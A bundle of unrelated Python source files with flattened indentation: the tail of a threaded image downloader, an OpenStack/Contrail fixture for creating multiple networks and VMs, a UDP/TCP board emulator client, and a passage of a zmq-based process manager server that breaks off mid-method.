if r.status_code != requests.codes.ok:
flag = False
#If all above checks are ok the flag variable would be true
if flag:
#print(r.headers)
with open(filelocation, 'wb') as f:
for chunk in r.iter_content(1024):
if chunk:
f.write(chunk)
else:
print("Error downloading "+link)
def createNewDownloadThread(link, filelocation,minKB):
download_thread = threading.Thread(target=download, args=(link,filelocation,minKB))
download_thread.start()
for i in range(0,len(imageURLfiltered)):
if useOriginalName:
filesplit = urllib.parse.unquote(imageURLfiltered[i].split("/")[-1])
fileName = saveLocation + slugify(filesplit[:-4])+"."+slugify(filesplit[-3:])
else:
fileName = saveLocation +fileprefix+str(i)+"."+slugify(imageURLfiltered[i][-3:])
while(threading.active_count()>threadCount):
time.sleep(0.1)
print("\rDownloading "+str(i+1)+" of "+str(len(imageURLfiltered))+": "+imageURLfiltered[i]+"...",end=" ")
createNewDownloadThread(imageURLfiltered[i],fileName,minKB)
############Summary of download
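# A minimal completion wait (sketch): block until all download worker threads finish
# so the process does not exit while files are still being written, then report.
while threading.active_count() > 1: time.sleep(0.5)
print("\nDone. Attempted "+str(len(imageURLfiltered))+" downloads to "+saveLocation)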
|
multiple_vn_vm_test.py
|
# Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run specific tests,
# You can do 'python -m testtools.run -l tests'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will try to pick params.ini in PWD
#
import os
from time import sleep
from common.openstack_libs import nova_client as mynovaclient
from common.openstack_libs import nova_exception as novaException
import fixtures
from common.contrail_test_init import ContrailTestInit
from vn_test import *
from quantum_test import *
from vnc_api_test import *
from nova_test import *
from vm_test import *
from common.connections import ContrailConnections
from floating_ip import *
from policy_test import *
from contrail_fixtures import *
from tcutils.util import *
import threading
import Queue
class create_multiple_vn_and_multiple_vm_fixture(fixtures.Fixture):
# @classmethod
def __init__(self, connections, inputs, policy_objs=[], subnets=[], project_name=None, image_name='ubuntu', flavor='contrail_flavor_tiny', vn_name=get_random_name('vn'), vm_name=get_random_name('vm'), vn_count=1, vm_count=2, subnet_count=2, af=None, userdata=None):
"""
creates a dict of the format: {vn_name:{vm_name:vm_obj,...}}
"""
self.connections = connections
self.inputs = inputs
if not project_name:
project_name = self.inputs.project_name
self.project_name = project_name
self.vn_name = vn_name
self.vn_count = vn_count
self.stack = af or self.inputs.get_af()
self.subnet_count = subnet_count
self.vm_name = vm_name
self.vm_count = vm_count
self.image_name = image_name
self.flavor = flavor
self.nova_h = self.connections.nova_h
self.q = Queue.Queue()
self.vn_threads = []
self.vm_threads = []
self.userdata = userdata
self.nova_h.get_image(self.image_name)
self.random_subnets = []
def calculateSubnetAF(self, af):
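# Keeps drawing a random CIDR until it does not overlap any previously chosen subnet,
# raises if the prefix cannot host subnet_count subnets, and returns the subnet strings.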
while True:
network=get_random_cidr(af=af, mask=SUBNET_MASK[af]['min'])
for rand_net in self.random_subnets:
if not cidr_exclude(network, rand_net):
break
else:
break
net, plen = network.split('/')
plen = int(plen)
max_plen = SUBNET_MASK[af]['max']
reqd_plen = max_plen - (int(self.subnet_count) - 1).bit_length()
if plen > reqd_plen:
max_subnets = 2 ** (max_plen - plen)
raise Exception("Network prefix %s can be subnetted "
"only to maximum of %s subnets" % (network, max_subnets))
subnets = list(IPNetwork(network).subnet(plen))
return map(lambda subnet: subnet.__str__(), subnets[:])
def calculateSubnet(self):
self.subnet_list = []
if 'v4' in self.stack or 'dual' in self.stack:
self.subnet_list.extend(self.calculateSubnetAF(af='v4'))
if 'v6' in self.stack or 'dual' in self.stack:
self.subnet_list.extend(self.calculateSubnetAF(af='v6'))
self.random_subnets.extend(self.subnet_list)
def createMultipleVN(self):
self.vn_obj_dict = {}
self.vn_keylist = []
self.vn_valuelist = []
for x in range(self.vn_count):
try:
vn_name = self.vn_name
vn_name = vn_name + str(x)
self.calculateSubnet()
vn_obj = VNFixture(
project_name=self.project_name, connections=self.connections,
vn_name=vn_name, inputs=self.inputs, subnets=self.subnet_list, af=self.stack)
vn_obj.setUp()
self.vn_keylist.append(vn_name)
self.vn_valuelist.append(vn_obj)
except Exception as e:
print e
raise
count = 0
self.vn_obj_dict = dict(zip(self.vn_keylist, self.vn_valuelist))
def createMultipleVM(self):
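# VM fixtures are built per VN; their setUp() calls run in threads started with a small
# stagger and joined with a short timeout, so callers should follow up with
# verify_vms_on_setup() or wait_till_vms_are_up() before relying on the VMs.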
self.vm_obj_dict = {}
self.vm_keylist = []
self.vm_valuelist = []
self.vm_per_vn_dict = {}
self.vm_per_vn_list = []
# for each vn, creating the number of vms
start = 0
count = 0
try:
for k in self.vn_keylist:
self.vn_obj = self.vn_obj_dict[k].obj
for c in range(self.vm_count):
vm_name = get_random_name('%s_%s_%s' % (k, self.vm_name, c))
vm_fixture = VMFixture(connections=self.connections,
vn_obj=self.vn_obj, vm_name=vm_name, project_name=self.inputs.project_name,
userdata=self.userdata, image_name=self.image_name, flavor=self.flavor)
t = threading.Thread(target=vm_fixture.setUp, args=())
self.vm_threads.append(t)
count += 1
self.vm_keylist.append(vm_name)
self.vm_valuelist.append(vm_fixture)
self.vm_obj_dict = dict(
zip(self.vm_keylist, self.vm_valuelist))
self.vm_per_vn_list.append(self.vm_obj_dict)
self.vm_per_vn_dict = dict(
zip(self.vn_keylist, self.vm_per_vn_list))
except Exception as e:
print e
for thread in self.vm_threads:
time.sleep(3)
thread.start()
for thread in self.vm_threads:
thread.join(5)
def verify_vns_on_setup(self):
try:
result = True
verify_threads = []
for vn_name, vn_obj in self.vn_obj_dict.items():
t = threading.Thread(target=vn_obj.verify_on_setup, args=())
verify_threads.append(t)
for thread in verify_threads:
time.sleep(0.5)
thread.daemon = True
thread.start()
for thread in verify_threads:
thread.join(10)
for vn_name, vn_obj in self.vn_obj_dict.items():
if not vn_obj.verify_result:
result = result and False
except Exception as e:
print e
result = result and False
finally:
return result
def verify_vms_on_setup(self):
try:
result = True
verify_threads = []
for vm_fix in self.vm_valuelist:
t = threading.Thread(target=vm_fix.verify_on_setup, args=())
verify_threads.append(t)
for thread in verify_threads:
time.sleep(0.5)
# thread.daemon = True
thread.start()
for thread in verify_threads:
thread.join(60)
for vm_fix in self.vm_valuelist:
if not vm_fix.verify_vm_flag:
result = result and False
except Exception as e:
print e
result = result and False
finally:
return result
def wait_till_vms_are_up(self):
try:
result = True
verify_threads = []
for vm_fix in self.vm_valuelist:
t = threading.Thread(target=vm_fix.wait_till_vm_is_up, args=())
verify_threads.append(t)
for thread in verify_threads:
time.sleep(0.5)
# thread.daemon = True
thread.start()
for thread in verify_threads:
thread.join(20)
for vm_fix in self.vm_valuelist:
if not vm_fix.verify_vm_flag:
result = result and False
except Exception as e:
print e
result = result and False
finally:
return result
def setUp(self):
super(create_multiple_vn_and_multiple_vm_fixture, self).setUp()
self.createMultipleVN()
time.sleep(5)
self.createMultipleVM()
time.sleep(5)
def cleanUp(self):
super(create_multiple_vn_and_multiple_vm_fixture, self).cleanUp()
vm_thread_to_delete = []
vn_thread_to_delete = []
try:
for vm_fix in self.vm_valuelist:
print 'deleting vm'
t = threading.Thread(target=vm_fix.cleanUp, args=())
vm_thread_to_delete.append(t)
if vm_thread_to_delete:
for vm_thread in vm_thread_to_delete:
time.sleep(3)
vm_thread.start()
for vm_thread in vm_thread_to_delete:
vm_thread.join()
except Exception as e:
print e
time.sleep(10)
try:
for vn_name, vn_obj in self.vn_obj_dict.items():
vn_obj.cleanUp()
except Exception as e:
print e
try:
for vn_name, vn_obj in self.vn_obj_dict.items():
assert vn_obj.verify_not_in_result
except Exception as e:
print e
|
emu.py
|
import asyncio
import sys, socket
import threading
controller_ip = ('192.168.100.2', 5555)
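# Default controller address; it is replaced once the controller answers a UDP command
# with a 'TCP:<ip>:<port>' string, after which tcpProcess() talks to that address.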
def udpProcess():
global controller_ip
UDP_HOST = ''
UDP_PORT = 5555
def print_response(conn, e):
global controller_ip
conn.bind(('0.0.0.0', 5556))
print("Init udp reader")
while True:
data, addr = conn.recvfrom(1024)
data = str(data, encoding="utf8")
print("Udp resp: ", data.strip())
if data.find("TCP") > -1:
protocol, ip, port = data.split(":")
controller_ip = (ip, int(port))
print("Controller addr: ", controller_ip)
e.set()
break
print("Start udp part")
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
event = threading.Event()
printRespThread = threading.Thread(target=print_response, args=(sock, event))
printRespThread.start()
while True:
if event.is_set():
print("Start TCP controller addr ", controller_ip)
break
cmd = input("udp>")
if not cmd:
continue
if cmd == "exit":
print("Stop udp part")
break
sock.sendto(cmd.encode(), (UDP_HOST, UDP_PORT))
print("Close udp connection")
sock.close()
def tcpProcess():
print("Start tcp part")
if not controller_ip:
print("No controller")
return False
def print_response(conn):
print("Init tcp reader")
while True:
data, addr = conn.recvfrom(1024)
data = str(data, encoding="utf8")
print("Tcp resp: ", data.strip())
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_socket.connect(controller_ip)
printRespThread = threading.Thread(target=print_response, args=(tcp_socket,))
printRespThread.start()
try:
while True:
cmd = input("tcp>")
if not cmd:
continue
if cmd == "exit":
print("Stop tcp part")
break
tcp_socket.sendall(cmd.encode())
except KeyboardInterrupt:
print("Close tcp connection")
tcp_socket.close()
print("Close tcp connection")
def main():
print("Board Emulator v1")
while True:
cmd = input(">>")
if not cmd:
continue
print("Run command: ", cmd)
if cmd == 'udp':
udpProcess()
if cmd == 'tcp':
tcpProcess()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print("Buy buy")
print("Close resources")
sys.exit()
|
pman.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import abc
import time
import os
import threading
import zmq
from webob import Response
import psutil
import queue
from functools import partial
import platform
import multiprocessing
import inspect
import json
import ast
import shutil
import datetime
import socket
import uuid
# pman local dependencies
try:
from ._colors import Colors
from .debug import debug
from .C_snode import *
from .debug import debug
from .openshiftmgr import *
from .crunner import *
except:
from _colors import Colors
from debug import debug
from C_snode import *
from debug import debug
from openshiftmgr import *
from crunner import *
import docker
import pudb
import pprint
str_devNotes = """
08 June 2017
* NOTE: The zmq socket *always* sends back HTTP formatted headers around
the response string. The listening object (usually pfurl) should
*NOT* parse this with --httpResponseBodyParse!
10 May 2017
* Should methods in the listener be functors? Certain methods, such as
'run' and 'status' need specialized implementations based on a run
environment. This run environment is not known by the listener when
it starts, but can be specified at payload parsing by the process()
method. Thus, a method such as
t_run_process()
might need at arbitrary call time to be specialized to some external
condition set (say by running as a container). Naively, this can be
parsed in the message and thread redirected to
t_run_process_swarm()
for example.
Would a functor type approach be useful at all?
"""
CONTAINER_NAMES = ['container', 'openshift']
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stopper = threading.Event()
def stopit(self):
self._stopper.set()
def stopped(self):
return self._stopper.is_set()
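# pman wraps its start() loop in a StoppableThread (see thread_serve()); the serving loop
# polls stopped() and, once set, shuts down the listener threads, the fileIO thread and
# the zmq sockets.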
class pman(object):
"""
The server class for the pman (process manager) server
"""
__metaclass__ = abc.ABCMeta
def col2_print(self, str_left, str_right):
self.dp.qprint(Colors.WHITE +
('%*s' % (self.LC, str_left)), end='')
self.dp.qprint(Colors.LIGHT_BLUE +
('%*s' % (self.RC, str_right)) + Colors.NO_COLOUR)
def __init__(self, **kwargs):
"""
Constructor
"""
self.within = None # An encapsulating object
# Description
self.str_desc = ""
self.str_name = ""
self.str_version = ""
self.__name__ = 'pman'
# The main server function
self.threaded_server = None
# The listener thread array -- each element of this array is a threaded listener
# object
self.l_listener = []
self.listenerSleep = 0.1
# The fileIO threaded object
self.fileIO = None
# DB
self.b_clearDB = False
self.str_DBpath = '/tmp/pman'
self._ptree = C_stree()
self.str_fileio = 'json'
self.DBsavePeriod = 60
# Comms
self.str_protocol = "tcp"
self.str_IP = "127.0.0.1"
self.str_port = "5010"
self.router_raw = 0
self.listeners = 1
self.b_http = False
self.socket_front = None
self.socket_back = None
# Job info
self.auid = ''
self.jid = ''
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'protocol': self.str_protocol = val
if key == 'IP': self.str_IP = val
if key == 'port': self.str_port = val
if key == 'raw': self.router_raw = int(val)
if key == 'listeners': self.listeners = int(val)
if key == 'listenerSleep': self.listenerSleep = float(val)
if key == 'DBsavePeriod': self.DBsavePeriod = int(val)
if key == 'http': self.b_http = int(val)
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
if key == 'DBpath': self.str_DBpath = val
if key == 'clearDB': self.b_clearDB = val
if key == 'desc': self.str_desc = val
if key == 'name': self.str_name = val
if key == 'version': self.str_version = val
# pudb.set_trace()
# Screen formatting
self.LC = 30
self.RC = 50
self.dp = debug( verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name__)
if self.b_clearDB and os.path.isdir(self.str_DBpath):
shutil.rmtree(self.str_DBpath)
print(self.str_desc)
# pudb.set_trace()
self.col2_print('Server is listening on',
'%s://%s:%s' % (self.str_protocol, self.str_IP, self.str_port))
self.col2_print('Router raw mode', str(self.router_raw))
self.col2_print('HTTP response back mode', str(self.b_http))
self.col2_print('listener sleep', str(self.listenerSleep))
# Create the main internal DB data structure/abstraction
self._ptree = C_stree()
# Read the DB from HDD
self.DB_fileIO(cmd = 'load')
# Setup zmq context
self.zmq_context = zmq.Context()
def DB_read(self, **kwargs):
"""
Read the DB from filesystem. If DB does not exist on filesystem,
create an empty DB and save to filesystem.
"""
if os.path.isdir(self.str_DBpath):
self.dp.qprint("Reading pman DB from disk...\n")
self._ptree = C_stree.tree_load(
pathDiskRoot = self.str_DBpath,
loadJSON = True,
loadPickle = False)
self.dp.qprint("pman DB read from disk...\n")
self.col2_print('Reading pman DB from disk:', 'OK')
else:
P = self._ptree
# P.cd('/')
# P.mkdir('proc')
P.tree_save(
startPath = '/',
pathDiskRoot = self.str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False
)
self.col2_print('Reading pman DB from disk:',
'No DB found... creating empty default DB')
self.dp.qprint(Colors.NO_COLOUR, end='')
def DB_fileIO(self, **kwargs):
"""
Process DB file IO requests. Typically these control the
DB -- save or load.
"""
str_cmd = 'save'
str_DBpath = self.str_DBpath
tree_DB = self._ptree
for k,v in kwargs.items():
if k == 'cmd': str_cmd = v
if k == 'fileio': self.str_fileio = v
if k == 'dbpath': str_DBpath = v
if k == 'db': tree_DB = v
# self.dp.qprint('cmd = %s' % str_cmd)
# self.dp.qprint('fileio = %s' % self.str_fileio)
# self.dp.qprint('dbpath = %s' % str_DBpath)
if str_cmd == 'save':
if os.path.isdir(str_DBpath):
shutil.rmtree(str_DBpath, ignore_errors=True)
#print(tree_DB)
if self.str_fileio == 'json':
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False)
if self.str_fileio == 'pickle':
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = False,
savePickle = True)
if str_cmd == 'load':
if os.path.isdir(str_DBpath):
self.dp.qprint("Reading pman DB from disk...\n")
if self.str_fileio == 'json':
tree_DB = C_stree.tree_load(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
loadJSON = True,
loadPickle = False)
if self.str_fileio == 'pickle':
tree_DB = C_stree.tree_load(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
loadJSON = False,
loadPickle = True)
self.dp.qprint("pman DB read from disk...\n")
self.col2_print('Reading pman DB from disk:', 'OK')
self._ptree = tree_DB
else:
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False
)
self.col2_print('Reading pman DB from disk:',
'No DB found... creating empty default DB')
self.dp.qprint(Colors.NO_COLOUR, end='')
def thread_serve(self):
"""
Serve the 'start' method in a thread.
:return:
"""
self.threaded_server = StoppableThread(target=self.start)
self.threaded_server.start()
while not self.threaded_server.stopped():
time.sleep(1)
# Stop the listeners...
self.dp.qprint("setting b_stopThread on all listeners...")
for i in range(0, self.listeners):
self.dp.qprint("b_stopThread on listener %d and executing join()..." % i)
self.l_listener[i].b_stopThread = True
self.l_listener[i].join()
# Stop the fileIO
self.fileIO.b_stopThread = True
self.dp.qprint("b_stopThread on fileIO executing join()...")
self.fileIO.join()
self.dp.qprint("Shutting down the zmq infrastructure...")
try:
self.dp.qprint('calling self.socket_back.close()')
self.socket_back.close()
except:
self.dp.qprint('Caught exception in closing back socket')
try:
self.dp.qprint('calling self.socket_front.close()')
self.socket_front.close()
except zmq.error.ZMQError:
self.dp.qprint('Caught exception in closing front socket...')
self.dp.qprint('calling zmq_context.term()')
# self.zmq_context.term()
self.dp.qprint("calling join() on all this thread...")
self.threaded_server.join()
self.dp.qprint("shutdown successful...")
def start(self):
"""
Main execution.
* Instantiate several 'listener' worker threads
** 'listener' threads are used to process input from external
processes. In turn, 'listener' threads can thread out
'crunner' threads that actually "run" the job.
* Instantiate a job poller thread
** 'poller' examines the internal DB entries and regularly
queries the system process table, tracking if jobs
are still running.
"""
self.col2_print('Starting Listener threads', self.listeners)
# Front facing socket to accept client connections.
self.socket_front = self.zmq_context.socket(zmq.ROUTER)
self.socket_front.router_raw = self.router_raw
self.socket_front.setsockopt(zmq.LINGER, 1)
self.socket_front.bind('%s://%s:%s' % (self.str_protocol,
self.str_IP,
self.str_port)
)
# Backend socket to distribute work.
self.socket_back = self.zmq_context.socket(zmq.DEALER)
self.socket_back.setsockopt(zmq.LINGER, 1)
self.socket_back.bind('inproc://backend')
# Start the 'fileIO' thread
self.fileIO = FileIO( timeout = self.DBsavePeriod,
within = self,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
self.fileIO.start()
# Start the 'listener' workers... keep track of each
# listener instance so that we can selectively stop
# them later.
for i in range(0, self.listeners):
self.l_listener.append(Listener(
id = i,
context = self.zmq_context,
DB = self._ptree,
DBpath = self.str_DBpath,
http = self.b_http,
within = self,
listenerSleep = self.listenerSleep,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile))
self.l_listener[i].start()
# Use built in queue device to distribute requests among workers.
# What queue device does internally is,
# 1. Read a client's socket ID and request.
# 2. Send socket ID and request to a worker.
# 3. Read a client's socket ID and result from a worker.
# 4. Route result back to the client using socket ID.
self.dp.qprint("*******before zmq.device!!!")
try:
zmq.device(zmq.QUEUE, self.socket_front, self.socket_back)
except:
self.dp.qprint('Hmmm... some error was caught on shutting down the zmq.device...')
self.dp.qprint("*******after zmq.device!!!")
def __iter__(self):
yield('Feed', dict(self._stree.snode_root))
# @abc.abstractmethod
# def create(self, **kwargs):
# """Create a new tree
#
# """
def __str__(self):
"""Print
"""
return str(self.stree.snode_root)
@property
def stree(self):
"""STree Getter"""
return self._stree
@stree.setter
def stree(self, value):
"""STree Getter"""
self._stree = value
class FileIO(threading.Thread):
"""
A class that periodically saves the database from memory out to disk.
"""
def __init__(self, **kwargs):
self.__name = "FileIO"
self.b_http = False
self.str_DBpath = "/tmp/pman"
self.timeout = 60
self.within = None
self.b_stopThread = False
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'DB': self._ptree = val
if key == 'DBpath': self.str_DBpath = val
if key == 'timeout': self.timeout = val
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
self.dp = debug(verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
threading.Thread.__init__(self)
def run(self):
""" Main execution. """
# pudb.set_trace()
# Periodically save the DB to disk until asked to stop.
while not self.b_stopThread:
# self.dp.qprint('Saving DB as type "%s" to "%s"...' % (
# self.within.str_fileio,
# self.within.str_DBpath
# ))
self.within.DB_fileIO(cmd = 'save')
# self.dp.qprint('DB saved...')
for second in range(0, self.timeout):
if not self.b_stopThread:
time.sleep(1)
else:
break
self.dp.qprint('returning from FileIO run method...')
# raise ValueError('FileIO thread terminated.')
class Listener(threading.Thread):
""" Listeners accept communication requests from front facing server.
Parse input text streams and act accordingly. """
def __init__(self, **kwargs):
self.__name = "Listener"
self.b_http = False
self.poller = None
self.str_DBpath = "/tmp/pman"
self.str_jobRootDir = ''
self.listenerSleep = 0.1
self.jid = ''
self.auid = ''
self.within = None
self.b_stopThread = False
self.openshiftmgr = None
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'context': self.zmq_context = val
if key == 'listenerSleep': self.listenerSleep = float(val)
if key == 'id': self.worker_id = val
if key == 'DB': self._ptree = val
if key == 'DBpath': self.str_DBpath = val
if key == 'http': self.b_http = val
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
self.dp = debug(verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
threading.Thread.__init__(self)
# logging.debug('leaving __init__')
def df_print(self, adict):
"""
Return a nicely formatted string representation of a dictionary
"""
return self.pp.pformat(adict).strip()
def run(self):
""" Main execution. """
# Socket to communicate with front facing server.
self.dp.qprint('starting...')
socket = self.zmq_context.socket(zmq.DEALER)
socket.connect('inproc://backend')
b_requestWaiting = False
resultFromProcessing = False
request = ""
client_id = -1
self.dp.qprint(Colors.BROWN + "Listener ID - %s: run() - Ready to serve..." % self.worker_id)
while not self.b_stopThread:
# wait (non blocking) for input on socket
try:
client_id, request = socket.recv_multipart(flags = zmq.NOBLOCK)
self.dp.qprint('Received %s from client_id: %s' % (request, client_id))
b_requestWaiting = True
except zmq.Again as e:
if self.listenerSleep:
time.sleep(self.listenerSleep)
else:
pass
if b_requestWaiting:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Received comms from client.' % (self.worker_id))
self.dp.qprint(Colors.BROWN + 'Client sends: %s' % (request))
resultFromProcessing = self.process(request)
# pudb.set_trace()
if resultFromProcessing:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Sending response to client.' %
(self.worker_id))
self.dp.qprint('JSON formatted response:')
str_payload = json.dumps(resultFromProcessing, sort_keys=False, indent=4)
self.dp.qprint(Colors.LIGHT_CYAN + str_payload)
self.dp.qprint(Colors.BROWN + 'len = %d chars' % len(str_payload))
socket.send(client_id, zmq.SNDMORE)
if self.b_http:
str_contentType = "application/html"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = "%s%s" % (str_HTTPpre, str(res))
str_res = str_res.replace("UTF-8", "UTF-8\nAccess-Control-Allow-Origin: *")
self.dp.qprint('HTML response')
self.dp.qprint(str_res.encode())
socket.send(str_res.encode())
else:
str_contentType = "application/json"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = '%s%s' % (str_HTTPpre, (res))
self.dp.qprint(str_res)
socket.send_string(str_res)
b_requestWaiting = False
self.dp.qprint('Listener ID - %s: Returning from run()...' % self.worker_id)
# raise('Listener ID - %s: Thread terminated' % self.worker_id)
return True
def t_search_process(self, *args, **kwargs):
"""
Search
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In search process...")
d_request = {}
d_ret = {}
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
b_pathSpec = False
str_path = ""
if 'path' in d_meta:
b_pathSpec = True
str_path = d_meta['path']
b_jobSpec = False
str_jobSpec = ""
if 'job' in d_meta:
b_jobSpec = True
str_jobSpec = d_meta['job']
b_fieldSpec = False
str_fieldSpec = ""
if 'field' in d_meta:
b_fieldSpec = True
str_fieldSpec = d_meta['field']
b_whenSpec = False
str_whenSpec = "end"
if 'when' in d_meta:
b_whenSpec = True
str_whenSpec = d_meta['when']
self.dp.qprint(d_meta)
self.dp.qprint(b_pathSpec)
str_fileName = d_meta['key']
str_target = d_meta['value']
p = self._ptree
str_origDir = p.cwd()
str_pathOrig = str_path
for r in self._ptree.lstr_lsnode('/'):
if p.cd('/' + r)['status']:
str_val = p.cat(str_fileName)
if str_val == str_target:
if not b_pathSpec:
str_path = '/api/v1/' + r + '/' + str_fileName
else:
str_path = '/api/v1/' + r + str_pathOrig
if str_path[-1] == '/': str_path = str_path[:-1]
if b_jobSpec:
str_path = '/api/v1/' + r + '/' + \
str_whenSpec + '/' + \
str_jobSpec + '/' + \
'%sInfo' % str_whenSpec + '/' + \
str_jobSpec + '/' + \
str_fieldSpec
d_ret[str(hits)] = {}
d_ret[str(hits)] = self.DB_get(path = str_path)
hits += 1
p.cd(str_origDir)
return {"d_ret": d_ret,
"status": bool(hits)}
def t_info_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In info process...")
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_search = self.t_search_process(request = d_request)['d_ret']
p = self._ptree
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathStart = '/api/v1/' + job + '/startInfo'
str_pathEnd = '/api/v1/' + job + '/endInfo'
d_ret[str(hits)+'.0'] = {}
d_ret[str(hits)+'.0'] = self.DB_get(path = str_pathStart)
d_ret[str(hits)+'.1'] = {}
d_ret[str(hits)+'.1'] = self.DB_get(path = str_pathEnd)
hits += 1
if not hits:
d_ret = {
"-1": {
"noJobFound": {
"endInfo": {"allJobsDone": None}
}
}
}
else:
b_status = True
return {"d_ret": d_ret,
"status": b_status}
def t_quit_process(self, *args, **kwargs):
"""
Process the 'quit' POST directive. This might appear counter-intuitive
at first glance since the 'quit' is the result of a REST POST, but it is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'saveDB' in d_meta.keys():
self.dp.qprint("Saving DB...")
self.within.DB_fileIO(cmd = 'save')
self.dp.qprint('calling threaded_server.stop()')
self.within.threaded_server.stopit()
self.dp.qprint('called threaded_server.stop()')
return {'d_ret': d_ret,
'status': True}
def t_get_process(self, *args, **kwargs):
"""
Process the 'get' POST directive. This might appear counter-intuitive
at first glance since the 'get' is the result of a REST POST, but it is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
str_path = '/api/v1' + d_meta['path']
d_ret = self.DB_get(path = str_path)
return {'d_ret': d_ret,
'status': True}
def t_fileiosetup_process(self, *args, **kwargs):
"""
Setup a thread with a socket listener. Return listener address to client
"""
self.dp.qprint("In fileiosetup process...")
d_ret = {}
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
d_ret['fileioIP'] = "%s" % self.within.str_IP
d_ret['fileioport'] = "%s" % (int(self.within.str_port) + self.worker_id)
d_ret['serveforever']=d_meta['serveforever']
d_args = {
'ip': d_ret['fileioIP'],
'port': d_ret['fileioport']
}
server = ThreadedHTTPServer((d_args['ip'], int(d_args['port'])), StoreHandler)
server.setup(args = d_args)
self.dp.qprint("serveforever = %d" % d_meta['serveforever'])
b_serveforever = False
if 'serveforever' in d_meta.keys():
b_serveforever = d_meta['serveforever']
if b_serveforever:
self.dp.qprint("about to serve_forever()...")
server.serve_forever()
else:
self.dp.qprint("about to handle_request()...")
server.handle_request()
return {"d_ret": d_ret,
"status": True}
def job_state(self, *args, **kwargs):
"""
Return a structure that can be further processed to determine the job's state.
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In job_state()...")
d_request = {}
d_ret = {}
b_status = False
b_container = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_search = self.t_search_process(request = d_request)['d_ret']
p = self._ptree
Ts = C_stree()
Te = C_stree()
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathStart = '/api/v1/' + job + '/start'
str_pathEnd = '/api/v1/' + job + '/end'
d_start = self.DB_get(path = str_pathStart)
d_end = self.DB_get(path = str_pathEnd)
Ts.initFromDict(d_start)
Te.initFromDict(d_end)
self.dp.qprint("Ts.cwd = %s " % Ts.cwd())
self.dp.qprint(Ts)
self.dp.qprint("Te.cwd = %s " % Te.cwd())
self.dp.qprint(Te)
l_subJobsStart = []
if Ts.cd('/%s/start' % job)['status']:
l_subJobsStart = Ts.lstr_lsnode()
l_subJobsStart = list(map(int, l_subJobsStart))
l_subJobsStart.sort()
self.dp.qprint("l_subJobsStart (pre) = %s" % l_subJobsStart)
if len(l_subJobsStart) > 1: l_subJobsStart = l_subJobsStart[:-1]
l_subJobsEnd = []
if Te.cd('/%s/end' % job)['status']:
l_subJobsEnd = Te.lstr_lsnode()
l_subJobsEnd = list(map(int, l_subJobsEnd))
l_subJobsEnd.sort()
self.dp.qprint("l_subJobsEnd (pre) = %s " % l_subJobsEnd)
if len(l_subJobsEnd) > 1: l_subJobsEnd = l_subJobsEnd[:-1]
self.dp.qprint("l_subJobsStart (post) = %s" % l_subJobsStart)
self.dp.qprint("l_subJobsEnd (post) = %s" % l_subJobsEnd)
for j in l_subJobsStart:
l_subJobsStart[j] = Ts.cat('/%s/start/%d/startInfo/%d/startTrigger' % \
(job, j, j))
# jobsEnd behaviour can be slightly different to the jobStart, particularly if
# the job being executed is killed -- sometimes recording the "death" event of
